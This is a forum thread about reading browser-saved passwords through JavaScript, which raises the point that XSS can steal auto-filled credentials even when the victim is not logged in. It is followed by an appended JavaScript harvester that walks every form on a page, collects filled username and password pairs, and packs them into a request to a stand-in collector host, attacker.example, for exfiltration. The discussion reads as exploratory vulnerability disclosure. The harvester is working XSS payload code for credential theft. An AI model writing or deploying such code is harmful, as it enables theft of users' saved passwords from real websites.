Hey guys.
I am very new to programming and was wondering if anyone else had seen this little trick.
This is a little Java code to get a saved password from a website.
javascript:alert(document.forms[0].elements[1].value)
The forms and values change from site to site, but this code works for this site.
If you click "remember me" on this website, then log out and type that code into the URL bar, it will return your password.
I just kind of thought it was neat.
Give it a try.
I've noticed this before but your post got me thinking about XSS and I just realized that it can be carried out even if you are not logged into a website.
The common misconception is that you have to be logged into a website for an XSS attack to steal your session and make use of it.
It appears that if you use the remember password feature, an XSS can be carried out even if you're not logged into a website, stealing your username and password credentials directly.
I haven't seen this type of XSS mentioned at all.
digital-ether
Interesting insight, I am fascinated by security concerns, yet I've never fully wrapped my brain around XSS attacks, and what you're saying definitely deserves investigation.
Do you think this is a real vulnerability?
I've looked into this a bit. There is a similar exploit mentioned on Linux.com: http://www.linux.com/feature/118166
However, this works on a bug in Firefox which makes it populate the user and password fields even though the action (URL to submit to) is a remote attacker's site. Most of the other forms based on the autocomplete of forms work this way also.
I couldn't find any articles on stealing the username and password directly just by getting their values through JavaScript.
So here is a proof of concept.
http://xss-password.appjet.net/
So yes, it is a real vulnerability. I'd consider it more serious than stealing session information, since it can be achieved at any time after the saving of the password by the browser.
I've only tested in FF2.
digital-ether
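The trick in the first post (a fixed index into document.forms[0].elements) and the read-the-values-with-JavaScript attack digital-ether describes in the proof-of-concept post, written out as an added example that is not code from the thread or from the linked proof of concept. Instead of guessing the element index, it walks every form on the page, reads each password field the browser has already filled in, pairs it with the nearest preceding text/email field as the username, and builds the URL an XSS payload would request to exfiltrate the result. The collector host https://attacker.example/c and the mock document are constructed for this example; on a real page you would pass the browser's own document.

```javascript
// Added example, not from the thread. Generalises
//   javascript:alert(document.forms[0].elements[1].value)
// into a harvester that does not depend on the field order of one site.
// `doc` is anything with a `forms` collection whose members have an
// `elements` collection (the real DOM `document`, or the mock below).
function harvestSavedCredentials(doc) {
  const found = [];
  for (const form of Array.from(doc.forms)) {
    let lastUserField = null; // the text field seen just before a password field
    for (const el of Array.from(form.elements)) {
      const type = (el.type || 'text').toLowerCase();
      if (type === 'text' || type === 'email') {
        lastUserField = el;
      } else if (type === 'password' && el.value) {
        // Only filled password fields matter: an empty one means the
        // browser did not auto-fill anything for this form.
        found.push({
          form: form.id || form.name || form.action || '',
          username: lastUserField ? lastUserField.value : null,
          password: el.value,
        });
      }
    }
  }
  return found;
}

// What an XSS payload does with the harvest: pack it into a GET request
// the attacker's server can log. The collector host is a placeholder.
// In a browser the request itself would be made with e.g.
//   new Image().src = buildExfilUrl(harvestSavedCredentials(document));
function buildExfilUrl(creds, collector = 'https://attacker.example/c') {
  const params = new URLSearchParams();
  creds.forEach((c, i) => {
    params.set(`u${i}`, c.username ?? '');
    params.set(`p${i}`, c.password);
  });
  return `${collector}?${params.toString()}`;
}

// Constructed mock of a login page after the browser restored a saved
// "remember me" login: a hidden CSRF token, a username field and a
// password field the browser has filled. The second form (site search)
// carries no credentials and must be ignored.
const mockDocument = {
  forms: [
    {
      id: 'login',
      action: '/login',
      elements: [
        { type: 'hidden', name: 'csrf', value: 'tok123' },
        { type: 'text', name: 'user', value: 'alice' },
        { type: 'password', name: 'pass', value: 'hunter2' },
      ],
    },
    {
      id: 'search',
      action: '/search',
      elements: [{ type: 'text', name: 'q', value: '' }],
    },
  ],
};

// Use the real DOM when run in a browser, the mock under Node.
const harvested = harvestSavedCredentials(
  typeof document !== 'undefined' ? document : mockDocument
);
console.log(harvested);
console.log(buildExfilUrl(harvested));
```

Whether this returns anything depends on the browser doing the auto-fill without any user interaction, which is what the thread observed in Firefox 2; later browser versions tightened when and on which origin saved passwords are filled in, so the same payload will behave differently across browsers and versions.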